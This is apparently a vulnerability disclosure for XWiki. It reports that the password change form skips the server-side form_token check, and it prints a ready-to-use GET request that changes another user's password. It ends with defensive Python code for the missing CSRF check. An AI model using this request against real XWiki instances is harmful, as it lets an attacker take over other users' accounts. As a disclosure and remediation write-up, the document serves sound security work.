There is no protection against CSRF attacks on the password change form. The form_token parameter is not checked on the server side: a request that omits this parameter entirely is accepted, and the password is changed.
An attacker who tricks an administrator into issuing such a request can therefore change the password of any user of the wiki.
Here is an example of a request that changes the password of the user toto on the current stable version of XWiki (both POST and GET methods work):
GET /xwiki/bin/view/XWiki/toto?xpage=passwd&xwikipassword=aaaaaaaa&xwikipassword2=aaaaaaaa HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=1AC1B58E461B85FBE5E1C980197C5A64; username="XXX"; password="XXX"; rememberme="false"; validation="XXX"
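As an added illustration, not XWiki's own code, here is the kind of server-side check the report says is missing: the handler accepts only POST, reads form_token only from the request body, and compares it in constant time against the token bound to the session, so the GET request above is rejected before the password is touched. The helper names (issue_form_token, csrf_check, handle_password_change) are hypothetical.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the request line from the report above (a GET, no form_token).
REPORTED_REQUEST_LINE = (
    "GET /xwiki/bin/view/XWiki/toto?xpage=passwd"
    "&xwikipassword=aaaaaaaa&xwikipassword2=aaaaaaaa HTTP/1.1"
)


def issue_form_token(session: dict) -> str:
    """Bind a fresh random token to the server-side session; the password
    form embeds it as the form_token field (hypothetical helper)."""
    token = secrets.token_urlsafe(32)
    session["form_token"] = token
    return token


def csrf_check(session: dict, method: str, body: str) -> tuple:
    """The server-side form_token validation the report says is absent.
    The token is read only from the POST body, never from the query string."""
    if method != "POST":
        return False, "state-changing request must be POST"
    supplied = parse_qs(body).get("form_token", [None])[0]
    expected = session.get("form_token")
    if not supplied or not expected:
        return False, "form_token missing"
    # Constant-time comparison so a mismatch leaks nothing about the token.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "form_token mismatch"
    return True, "ok"


def handle_password_change(session: dict, request_line: str, body: str = ""):
    """Hypothetical handler for xpage=passwd: reject before touching the password."""
    method, target, _version = request_line.split(" ", 2)
    ok, reason = csrf_check(session, method, body)
    if not ok:
        return ("rejected", reason)
    params = {k: v[0] for k, v in parse_qs(body).items()}
    if params.get("xwikipassword") != params.get("xwikipassword2"):
        return ("rejected", "passwords do not match")
    # Real code would now update the user named in the target path.
    user = urlsplit(target).path.rsplit("/", 1)[-1]
    return ("changed", user)
```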